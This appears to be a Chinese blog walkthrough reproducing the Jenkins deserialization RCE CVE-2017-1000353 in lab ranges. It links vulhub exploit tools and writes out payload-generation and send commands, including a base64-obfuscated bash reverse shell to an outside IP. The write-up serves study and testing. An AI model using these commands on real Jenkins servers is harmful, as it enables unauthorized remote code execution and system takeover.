Jenkins 远程代码执行漏洞(CVE-2017-1000353) 复现
所有文章,仅供安全研究与学习之用,后果自负!Jenkins 远程代码执行漏洞(CVE-2017-1000353)Jenkins 远程代码执行漏洞(CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复Jenkins 远程代码执行漏洞(CVE-2017-1000353)0x01 漏洞描述Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时
·
所有文章,仅供安全研究与学习之用,后果自负!
Jenkins 远程代码执行漏洞(CVE-2017-1000353)
Jenkins 远程代码执行漏洞(CVE-2017-1000353)
0x01 漏洞描述
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限
该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。
0x02 影响范围
所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
0x03 漏洞复现
工具链接
https://link.zhihu.com/?target=https%3A//github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
exp
https://link.zhihu.com/?target=https%3A//github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py
访问靶场
创建文件 docker环境测试
(1)生成序列化字符串 jenkins_poc.ser
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串。
(2)发送数据包,执行命令
python3 exploit.py http://119.29.67.4:8080 jenkins_poc.ser
复现成功
反弹shell在线靶场测试
(1) 生成序列化字符串
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA}|{base64,-d}|{bash,-i}"
(2)发送数据包 执行命令
python3 exploit.py http://vulfocus.fofa.so:42863/ jenkins_poc.ser
反弹shell成功
0x04 漏洞修复
升级版本
总结
经过测试
攻击机 java 版本为 下时攻击失败
后来 用1.8.0_291攻击成功 如下
更多推荐
已为社区贡献1条内容
所有评论(0)